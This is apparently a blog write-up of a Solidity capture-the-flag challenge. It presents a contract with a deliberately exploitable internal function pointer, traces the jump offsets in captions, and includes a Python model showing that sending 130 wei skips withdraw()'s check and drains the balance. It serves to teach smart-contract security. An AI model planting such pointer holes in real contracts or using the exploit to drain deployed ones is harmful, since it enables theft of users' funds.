Solidity CTF — Part 2: “Safe Execution”

Alexander Wade
Jun 25, 2018 · 7 min read

Part 2: “Safe Execution”

Explanation — Part 1: “Function Types”

FunctionTypes.sol — Drain the contract!
// Private: not callable externally, and rejects any call that carries ether.
function withdraw() private {
    require(msg.value == 0, 'dont send funds!');
    address(msg.sender).transfer(address(this).balance);
}

function breakIt() public payable {
    require(msg.value != 0, 'send funds!');
    Func memory func;
    func.f = frwd;
    // Adds msg.value to the stored internal function pointer (a jump destination).
    assembly { mstore(func, add(mload(func), callvalue)) }
    func.f();
}

struct Func { function () internal f; }
AddSub.sol
Func struct — pointer to 0x80 in memory
0x203 = 515 — ‘invalid’ jumpdest
0x10C = 268 — frwd() jumpdest
0x116 = 278 — withdraw() jumpdest
0x18E = 398 — funds transfer jumpdest
assembly { mstore(func, add(mload(func), callvalue)) }
0x80 now contains 0x10D
Success! 130 wei sent, 1 REth received
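The pointer arithmetic traced in the captions above, as a small Python model of why the require in withdraw() does not protect the transfer. This is an added example, not code from the original post. It models only the four offsets the page labels, and it assumes that 0x18E sits after the msg.value check and that entering withdraw() at 0x116 with ether attached hits that check.

```python
# Added example: a model of the jump arithmetic only, not an EVM.
# Offsets are the ones labelled on the page; real bytecode has more JUMPDESTs.
FUNC_SLOT = 0x80   # memory address of the Func struct
FRWD = 0x10C       # frwd() entry, the value first stored in func.f
WITHDRAW = 0x116   # withdraw() entry, before require(msg.value == 0)
TRANSFER = 0x18E   # funds transfer (assumed to lie after that require)
INVALID = 0x203    # the 'invalid' jumpdest

OUTCOME = {
    WITHDRAW: "revert: dont send funds!",
    TRANSFER: "balance transferred to msg.sender",
    INVALID: "halt: 'invalid' jumpdest",
}


def break_it(callvalue):
    """Return (jump target, outcome) for breakIt() called with callvalue wei."""
    if callvalue == 0:
        return None, "revert: send funds!"
    memory = {FUNC_SLOT: FRWD}          # func.f = frwd
    memory[FUNC_SLOT] += callvalue      # mstore(func, add(mload(func), callvalue))
    target = memory[FUNC_SLOT]          # func.f() jumps to this offset
    # The EVM halts exceptionally when a JUMP lands on anything but a JUMPDEST.
    return target, OUTCOME.get(target, "exceptional halt: not a JUMPDEST")


def callvalue_for(target):
    """Wei needed to move the pointer from frwd() to target (None if unreachable)."""
    delta = target - FRWD
    return delta if delta > 0 else None


if __name__ == "__main__":
    for wei in (0, 1, callvalue_for(WITHDRAW), callvalue_for(TRANSFER),
                callvalue_for(INVALID)):
        target, outcome = break_it(wei)
        shown = "-" if target is None else hex(target)
        print(f"{wei:>3} wei -> {shown:>5}  {outcome}")
```

The caller-controlled callvalue selects the jump target directly, so any check placed at the start of withdraw() is skipped whenever the pointer lands past it.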

What have we learned?

Authio

Security Auditing and Standards for Ethereum
